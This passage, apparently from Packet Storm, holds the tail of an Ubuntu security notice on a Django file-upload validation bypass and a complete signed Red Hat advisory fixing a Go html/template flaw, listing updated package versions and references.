 uploading multiple files using one form field. A remote attacker could  
 possibly use this issue to bypass certain validations.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
  python-django                   1.8.7-1ubuntu5.15+esm7  
  python-django-doc               1.8.7-1ubuntu5.15+esm7  
  python3-django                  1.8.7-1ubuntu5.15+esm7

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
  python-django                   1.6.11-0ubuntu1.3+esm6  
  python-django-doc               1.6.11-0ubuntu1.3+esm6

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6054-2  
  https://ubuntu.com/security/notices/USN-6054-1  
  CVE-2023-31047

Ubuntu Security Notice USN-6054-2

Red Hat Security Advisory 2023-3319-01 - Go Toolset provides the Go programming language tools and libraries. Go is alternatively known as golang.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: go-toolset:rhel8 security update  
Advisory ID:       RHSA-2023:3319-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3319  
Issue date:        2023-05-25  
CVE Names:         CVE-2023-24540   
=====================================================================

1. Summary:

An update for the go-toolset:rhel8 module is now available for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Go Toolset provides the Go programming language tools and libraries. Go is  
alternatively known as golang.

Security Fix(es):

* golang: html/template: improper handling of JavaScript whitespace  
(CVE-2023-24540)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2196027 - CVE-2023-24540 golang: html/template: improper handling of JavaScript whitespace

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
delve-1.9.1-1.module+el8.8.0+16778+5fbb74f5.src.rpm  
go-toolset-1.19.9-1.module+el8.8.0+18857+fca43658.src.rpm  
golang-1.19.9-1.module+el8.8.0+18857+fca43658.src.rpm

aarch64:  
go-toolset-1.19.9-1.module+el8.8.0+18857+fca43658.aarch64.rpm  
golang-1.19.9-1.module+el8.8.0+18857+fca43658.aarch64.rpm  
golang-bin-1.19.9-1.module+el8.8.0+18857+fca43658.aarch64.rpm

noarch:  
golang-docs-1.19.9-1.module+el8.8.0+18857+fca43658.noarch.rpm  
golang-misc-1.19.9-1.module+el8.8.0+18857+fca43658.noarch.rpm  
golang-src-1.19.9-1.module+el8.8.0+18857+fca43658.noarch.rpm  
golang-tests-1.19.9-1.module+el8.8.0+18857+fca43658.noarch.rpm

ppc64le:  
go-toolset-1.19.9-1.module+el8.8.0+18857+fca43658.ppc64le.rpm  
golang-1.19.9-1.module+el8.8.0+18857+fca43658.ppc64le.rpm  
golang-bin-1.19.9-1.module+el8.8.0+18857+fca43658.ppc64le.rpm

s390x:  
go-toolset-1.19.9-1.module+el8.8.0+18857+fca43658.s390x.rpm  
golang-1.19.9-1.module+el8.8.0+18857+fca43658.s390x.rpm  
golang-bin-1.19.9-1.module+el8.8.0+18857+fca43658.s390x.rpm

x86_64:  
delve-1.9.1-1.module+el8.8.0+16778+5fbb74f5.x86_64.rpm  
delve-debuginfo-1.9.1-1.module+el8.8.0+16778+5fbb74f5.x86_64.rpm  
delve-debugsource-1.9.1-1.module+el8.8.0+16778+5fbb74f5.x86_64.rpm  
go-toolset-1.19.9-1.module+el8.8.0+18857+fca43658.x86_64.rpm  
golang-1.19.9-1.module+el8.8.0+18857+fca43658.x86_64.rpm  
golang-bin-1.19.9-1.module+el8.8.0+18857+fca43658.x86_64.rpm  
golang-race-1.19.9-1.module+el8.8.0+18857+fca43658.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-24540  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZG9tLtzjgjWX9erEAQhJTw//bl/01d19YrHqzvTMQ9wOgIpyxxA//bnz  
DSLtDLGNjXwq+88UFLmDSTD8PLzTvIIrVqFmeLEBZrQwt9/mP18qBB9byFJHpIKQ  
6MteK+v5+/AFTW9WOJpj23JmspbNfr1HlLAYxwEkGVpD2DMGz78iAK6TmcYnYt8C  
TpfHi3HsxZb8BZi3LASyXb9KppJG38XmU1MfahQE4C1fRD2pCp94QxF0Bgy17ClT  
DuTtEA0m0P7doAAFE4JVVYKjV6B4Ips6viQE3D960MmwFX3sz0XK7Vh2rz1No01G  
vsuJdlzejqL39eAaoL/+6REO/PsSnPyWejgFywxTSGWlomfuPo7R1I2vlqnEbcMc  
Cx708HPPrQK2ZZD8FpfreYSGDQWUbjKorJHl6yH/XHzl8wCC9abTTkwKXK35iW40  
57HU6StsWPsjiatE6loPROlQGXs3cbi1j93px8XZ3f0CFamqEFe8T/IP7rbdZq23  
RK9sFLICiGohJKhUQ2yyqZC6UPvEGxFYEw5RpG850JhG8Ov4VnAusylMUNnKYGYy  
lep4uIV5fwHU6AxVUkwwog9hdltX2igh05KdusbmxpA5vJdE6IhpU5itLhZu34TR  
/SVxQnNSTrJny9WKPVycpBshb+jRYFB8gnEG+GJwY1vuO3lRqwMbu3WUaNWwRny/  
KFSf0a7BsFY=  
=5KHr  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm